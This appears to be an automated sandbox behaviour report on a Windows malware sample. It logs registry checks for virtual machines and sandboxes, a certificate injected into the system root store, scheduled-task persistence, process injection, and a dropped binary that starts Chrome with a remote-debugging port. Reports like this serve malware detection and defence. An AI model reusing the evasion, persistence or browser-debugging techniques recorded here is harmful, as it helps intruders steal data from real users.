\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NL58452.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1c29bfe45e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9aiiMOQ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa0be991e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YMci4Rc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kdMujZh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f9cdc126e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f1c548477b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b48baaab9c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8f9cdc126e.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 468c3dbc43.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8f9cdc126e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 468c3dbc43.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1176 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2116 taskkill.exe 3096 taskkill.exe 3292 taskkill.exe 3308 taskkill.exe 2352 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e futors.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 monthdragon.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e monthdragon.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 288 schtasks.exe 2628 schtasks.exe 1824 schtasks.exe 776 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 2728 skotes.exe 1760 7aencsM.exe 1760 7aencsM.exe 2816 3omTNLZ.exe 876 chrome.exe 876 chrome.exe 2816 3omTNLZ.exe 2816 3omTNLZ.exe 2816 3omTNLZ.exe 2816 3omTNLZ.exe 1760 7aencsM.exe 2856 YMci4Rc.exe 2856 YMci4Rc.exe 2856 YMci4Rc.exe 2856 YMci4Rc.exe 2232 9aiiMOQ.exe 2232 9aiiMOQ.exe 2232 9aiiMOQ.exe 2232 9aiiMOQ.exe 296 NL58452.exe 296 NL58452.exe 296 NL58452.exe 296 NL58452.exe 2548 f3Ypd8O.exe 2548 f3Ypd8O.exe 2548 f3Ypd8O.exe 2548 f3Ypd8O.exe 2536 kdMujZh.exe 1296 powershell.exe 1296 powershell.exe 1296 powershell.exe 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2536 kdMujZh.exe 1416 powershell.exe 2088 powershell.exe 1232 powershell.exe 2060 powershell.exe 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE 2372 mcwnj.exe 2060 powershell.exe 2060 powershell.exe 2148 483d2fa8a0d53818306efeb32d3.exe 1812 8f9cdc126e.exe 2532 monthdragon.exe 2532 monthdragon.exe 2532 monthdragon.exe 2532 monthdragon.exe 1812 8f9cdc126e.exe 1812 8f9cdc126e.exe 1812 8f9cdc126e.exe 1812 8f9cdc126e.exe 1812 8f9cdc126e.exe 2560 f1c548477b.exe 2560 f1c548477b.exe 2560 f1c548477b.exe 2560 f1c548477b.exe 2560 f1c548477b.exe 2416 3a3b5fb167.exe 2616 6610a02fea.exe 888 chrome.exe 888 chrome.exe 1728 Bjkm5hE.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeShutdownPrivilege 876 chrome.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 1416 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 1232 powershell.exe Token: SeDebugPrivilege 2060 powershell.exe Token: SeDebugPrivilege 2564 TempWVJHIM5MMT27WHFHCHLBI4PK4BXCVMBB.EXE Token: SeShutdownPrivilege 888 chrome.exe Token: SeShutdownPrivilege 888 chrome.exe Token: SeShutdownPrivilege 888 chrome.exe Token: SeShutdownPrivilege 888 chrome.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeShutdownPrivilege 2904 chrome.exe Token: SeDebugPrivilege 3308 taskkill.exe Token: SeShutdownPrivilege 2912 chrome.exe Token: SeShutdownPrivilege 2912 chrome.exe Token: SeShutdownPrivilege 2912 chrome.exe Token: SeShutdownPrivilege 2912 chrome.exe Token: SeDebugPrivilege 2352 taskkill.exe Token: SeDebugPrivilege 2116 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 3292 taskkill.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 3224 firefox.exe Token: SeDebugPrivilege 3224 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 876 chrome.exe 2712 amnew.exe 1072 221457afdd.exe 1072 221457afdd.exe 1072 221457afdd.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe 888 chrome.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 1072 221457afdd.exe 1072 221457afdd.exe 1072 221457afdd.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 3904 dc4867a9cf.exe 3904 dc4867a9cf.exe 3904 dc4867a9cf.exe 960 1c29bfe45e.exe 3224 firefox.exe 3224 firefox.exe 3224 firefox.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe 960 1c29bfe45e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2788 wrote to memory of 2728 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 31 PID 2788 wrote to memory of 2728 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 31 PID 2788 wrote to memory of 2728 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 31 PID 2788 wrote to memory of 2728 2788 f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe 31 PID 2728 wrote to memory of 1372 2728 skotes.exe 33 PID 2728 wrote to memory of 1372 2728 skotes.exe 33 PID 2728 wrote to memory of 1372 2728 skotes.exe 33 PID 2728 wrote to memory of 1372 2728 skotes.exe 33 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 1760 1372 7aencsM.exe 34 PID 1372 wrote to memory of 2756 1372 7aencsM.exe 35 PID 1372 wrote to memory of 2756 1372 7aencsM.exe 35 PID 1372 wrote to memory of 2756 1372 7aencsM.exe 35 PID 1372 wrote to memory of 2756 1372 7aencsM.exe 35 PID 1760 wrote to memory of 876 1760 7aencsM.exe 36 PID 1760 wrote to memory of 876 1760 7aencsM.exe 36 PID 1760 wrote to memory of 876 1760 7aencsM.exe 36 PID 1760 wrote to memory of 876 1760 7aencsM.exe 36 PID 876 wrote to memory of 2476 876 chrome.exe 37 PID 876 wrote to memory of 2476 876 chrome.exe 37 PID 876 wrote to memory of 2476 876 chrome.exe 37 PID 2728 wrote to memory of 2816 2728 skotes.exe 38 PID 2728 wrote to memory of 2816 2728 skotes.exe 38 PID 2728 wrote to memory of 2816 2728 skotes.exe 38 PID 2728 wrote to memory of 2816 2728 skotes.exe 38 PID 876 wrote to memory of 2916 876 chrome.exe 39 PID 876 wrote to memory of 2916 876 chrome.exe 39 PID 876 wrote to memory of 2916 876 chrome.exe 39 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 PID 876 wrote to memory of 3000 876 chrome.exe 41 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe"C:\Users\Admin\AppData\Local\Temp\f63b072d3ae4544e5b38781a4929535bb6b6592b5a85094f91b328542178e0a0.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef77c9758,0x7fef77c9768,0x7fef77c97786⤵PID:2476
-
-
C:\Windows\system32\ctfmon.exectfmon.exe6⤵PID:2916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1160 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:26⤵PID:3000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1560 --field-trial-handle=1412,i,1293821778183661576,10053266614642875980,131072 /prefetch:86⤵PID:2060
